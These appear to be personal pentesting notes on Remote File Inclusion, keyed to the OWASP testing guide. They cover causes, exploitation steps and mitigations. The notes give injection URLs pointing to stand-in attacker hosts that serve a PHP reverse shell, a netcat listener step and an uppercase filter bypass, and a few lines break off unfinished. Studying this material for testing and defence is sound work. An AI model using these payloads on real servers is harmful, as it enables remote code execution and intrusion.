RFI attack - Remote File Inclusion
OWASP
OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.1. Testing Directory Traversal File Include
| ID | Link to Hackinglife | Link to OWASP | Description |
|---|---|---|---|
| 5.1 | WSTG-ATHZ-01 | Testing Directory Traversal File Include | - Identify injection points that pertain to path traversal. - Assess bypassing techniques and identify the extent of path traversal (dot-dot-slash attack, Local/Remote file inclusion) |
A Remote File Inclusion (RFI) vulnerability is a type of security flaw found in web applications that allow an attacker to include and execute remote files on a web server. This vulnerability arises due to improper handling of user-supplied input within the context of file inclusion operations. This vulnerability can have severe consequences, including unauthorized access, data theft, and even full compromise of the affected server.
Causes
- Insufficient Input Validation: The web application may not validate or filter user input, allowing attackers to inject malicious data.
- Lack of Proper Sanitization: Even if input is validated, the application may not adequately sanitize the input before using it in file inclusion operations.
- Using User Input in File Paths: Applications that dynamically include files based on user input are at high risk if they don't carefully validate and control that input.
- Failure to Implement Security Controls: Developers might overlook security best practices, such as setting proper file permissions or using security mechanisms like web application firewalls (WAFs).
How to exploit it?
Identify Vulnerable Input: The attacker identifies a web application that accepts user input and uses it in a file inclusion operation, typically in the form of a URL parameter or a POST request parameter.
Inject Malicious Payload: The attacker injects a malicious file path or URL into the vulnerable parameter. For example, they might replace a legitimate parameter like ?page=about.php with ?page=http://evil.com/malicious_script.
Server Executes Malicious Code: When the web application processes the attacker's input, it dynamically includes the remote file or URL. This can lead to remote code execution on the web server, as the malicious code in the included file is executed in the server's context.
php
In php.ini file there are some parameters that define this policy:
- allow_url_fopen
- allow_url_include
If these functions are enabled (set to ON), then a LFI can turned into a Remote File Inclusion.
1. Create a php file with the remote shell
2. In that php file, craft malicious code
3. Serve that file from you machine (http_serve).4. Get your machine listening in a port with netcat.
5. In the injection point from where you can make a call to a URL, serve your file. For instance:
https:\\VICTIMurlADDRESS/PATH/PATH/page=http://<attackerip>/reverse.txt
# Sometimes to get php executed on the victim machin (and not the attacker), add an ?
https:\\VICTIMurlADDRESS/PATH/PATH/page=http://<attackerip>/reverse.txt?
Sometimes there might be some filtering for the payload (which was:
using uppercase
https:\VICTIMurlADDRESS/PATH/PATH/page=hTTP://
Other bypassing techniques for slashes
## Wrappers
### PHP wrapper
php://filter : allow the attacker to include local file and base64 encode as the output:
Mitigation
In php.ini disallow:
- allow_url_fopen
- allow_url_include
User static file inclusion (instead of dynamic file inclusion) by harcoding the files you want to include and not get them using GET or POST methods.
Tools and payloads
- See updated chart: Attacks and tools for web pentesting.